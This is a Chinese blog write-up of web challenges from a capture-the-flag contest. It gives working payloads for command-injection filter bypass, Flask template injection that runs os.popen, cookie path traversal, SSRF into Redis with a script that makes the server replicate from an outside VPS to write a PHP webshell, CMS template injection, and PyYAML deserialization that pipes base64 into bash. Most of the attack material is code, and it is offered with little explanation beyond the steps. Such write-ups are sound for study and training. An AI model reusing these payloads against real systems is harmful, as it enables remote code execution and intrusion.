首届祥云杯 web writeup

白给一天,最后30秒看着别人噌噌噌上分,心态崩了

Command

这题学弟做的没咋看:

利用sort或者uniq可以读取文件,采取?通配符读取文件绕过

  $a = shell_exec("ping -c 4 ".$ip);
  $ip=$_GET['url'];
  if(preg_match("/(;|'| |>|]|&| |\\$|python|sh|nc|tac|rev|more|tailf|index|php|head|nl|tail|less|cat|ruby|perl|bash|rm|cp|mv|\*|\{)/i", $ip)){
  }
  }else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){

根目录下没flag,用find命令查找flag

|find%09/%09-ctime%09-20

图片

之后读取文件

url=asdf||sort%09/etc/.findfla?/fla?.tx?

图片

flaskbot

首先提交name,它会base加密保存到cookie中,输入num,这个bot会用二分法去不断找你给的数,如果小于1则他赢,反之用户赢

并且通过debug发现这里最后有render_template_string,由于num被强转成float了,所以name处必定是ssti,num可以用nan来绕

图片

name如下即可

{{self.__dict__._TemplateReference__context.lipsum.__globals__["o""s"].__dict__["po""pen"]("cat /super_secret_fl"+"ag.txt").read()}}

图片

easygogogo

跟安恒一个月赛几乎一样= =

随便上传一个文件都会被解析成txt,所以传马不太可能了,发现传文件后在show中会显示文件的base64编码,并保存cookie

由于有过滤,先尝试上传../../../../../flag的文件,保存cookie

图片

Q/+BAwEBBVVzZXJzAf+CAAEEAQhVc2VybmFtZQEMAAEIUGFzc3dvcmQBDAABCEZpbGVuYW1lAQwAAQRTaWduAQwAAAB0/4IBBWFkbWluAQYxMjM0NTYBPi4vdXBsb2Fkcy80ZTViMDliMjE0OWY3NjE5Y2NhMTU1YzhiZDZkOGVlNS8uLi8uLi8uLi8uLi8uLi9mbGFnASAzNWViNzZmYzhiZDJkYTNlZjYyMTk2ZTkyNTcyOGU3YwA=

然后用一个新靶机,任意上传一个文件,然后将cookie替换即可

图片

图片

doyouknowssrf

跟GACTF的一题几乎一样

http://靶机/?url=http://aaa@127.0.0.1:5000@baidu.com/%3Furl=

但是这里加载了exp.so却反弹不了shell,最后redis主从复制写shell了
图片

然后打第一个payload

import urllib.parse
import requests as rq
vps = "123.57.240.205"
payload1 = f''' HTTP/1.1
AUTH 123456
config set dir /var/www/html
config set dbfilename wander.php
slaveof {vps} 6666
foo: '''
payload2 = f''' HTTP/1.1
AUTH 123456
slaveof no one
quit
foo: '''
def exp(payload):
    payload = urllib.parse.quote(payload).replace("%0A", "%0D%0A")
    payload = "?url=http://127.0.0.1:6379/" + payload
    payload = urllib.parse.quote(payload)
    payload = "?url=http://foo@127.0.0.1:5000%20@www.baidu.com/" + payload
    print(payload)
exp(payload1)
exp(payload2)

图片

图片

easyzzz

这题也挺离谱的,说是代码审计也不给个源码啥的,嗯找版本吗...

找后台,爆破或者查看泄露信息

/plugins/webuploader/js/webconfig.php

图片

得知后台路径为admin539,尝试sql注入无果,字典爆密码得到密码fuzzy9inve
在这里插入图片描述

登陆后台后修改模板getshell

https://xz.aliyun.com/t/7414

这里直接修改search.html,然后去search路由下

{if:1=1);echo `cat /fla*`;//}{end if}

图片

图片

profile

yaml/yml文件上传

上传文件可以下载,尝试查看app.py

http://eci-2zeis362pdxn0bqvp7s4.cloudeci1.ichunqiu.com:8888/uploads/4e5b09b2149f7619cca155c8bd6d8ee5/..%2F..%2Fapp.py

源码

from flask import Flask, render_template, request, flash, redirect, send_file,session
import os
import re
from hashlib import md5
import yaml
app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = os.path.join(os.curdir, "uploads")
app.config['SECRET_KEY'] = 'Th1s_is_A_Sup333er_s1cret_k1yyyyy'
ALLOWED_EXTENSIONS = {'yaml','yml'}
def allowed_file(filename):
    return '.' in filename and filename.rsplit('.', 1)[1].lower()
@app.route("/")
def index():
    session['priviledge'] = 'guest'
    return render_template("home.html")
@app.route("/upload", methods=["POST"])
def upload():
    file = request.files["file"]
    if file.filename == '':
        flash('No selected file')
        return redirect("/")
    elif not (allowed_file(file.filename) in ALLOWED_EXTENSIONS):
        flash('Please upload yaml/yml only.')
        return redirect("/")
    else:
        dirname = md5(request.remote_addr.encode()).hexdigest()
        filename = file.filename
        session['filename'] = filename 
        upload_directory = os.path.join(app.config['UPLOAD_FOLDER'], dirname)
        if not os.path.exists(upload_directory):
            os.mkdir(upload_directory)
        upload_path = os.path.join(app.config['UPLOAD_FOLDER'], dirname, filename)
        file.save(upload_path)
        return render_template("uploaded.html",path = os.path.join(dirname, filename))
@app.route("/uploads/<path:path>")
def uploads(path):
    return send_file(os.path.join(app.config['UPLOAD_FOLDER'], path))
@app.route("/view")
def view():
    dirname = md5(request.remote_addr.encode()).hexdigest()
    realpath = os.path.join(app.config['UPLOAD_FOLDER'], dirname,session['filename']).replace('..','')
    if session['priviledge'] =='elite' and os.path.isfile(realpath):
        try:
            with open(realpath,'rb') as f:
                data = f.read()
                if not re.fullmatch(b"^[ -\-/-\]a-}\n]*$",data, flags=re.MULTILINE):
                    info = {'user': 'elite-user'}
                    flash('Sth weird...')
                else:
                    info = yaml.load(data)
                if info['user'] == 'Administrator':
                    flash('Welcome admin!')
                else:
                    raise ()
        except:
            info = {'user': 'elite-user'}
    else:
        info = {'user': 'guest'}
    return render_template("view.html",user = info['user'])
if __name__ == "__main__":
    app.run('0.0.0.0',port=8888,threaded=True)

得到密钥后伪造session
图片

这样上传的yaml就会yaml.load触发yaml反序列化,但是前提是得匹配正则,也就是不能用

. _ `

参考https://hackmd.io/@harrier/uiuctf20
用\x十六进制绕,尝试外带但好像不能出网,尝试写到upload目录下

!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x6f\x73\x27\x29\x2e\x73\x79\x73\x74\x65\x6d\x28\x27\x2f\x72\x65\x61\x64\x66\x6c\x61\x67\x20\x3e\x20\x2e\x2f\x75\x70\x6c\x6f\x61\x64\x73\x2f\x34\x65\x35\x62\x30\x39\x62\x32\x31\x34\x39\x66\x37\x36\x31\x39\x63\x63\x61\x31\x35\x35\x63\x38\x62\x64\x36\x64\x38\x65\x65\x35\x2f\x33\x32\x31\x27\x29"

十六进制为

__import__('os').system('/readflag > ./uploads/4e5b09b2149f7619cca155c8bd6d8ee5/321

然后去下载uploads下文件图片

不过这里本地用这个能打通,但是远程死活不行我真艹了

!!python/object/apply:eval ["from os import system;system('echo d2hvYW1pID4gLi91cGxvYWRzLzRlNWIwOWIyMTQ5Zjc2MTljY2ExNTVjOGJkNmQ4ZWU1LzIyMw==|base64 -d|bash')"]
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇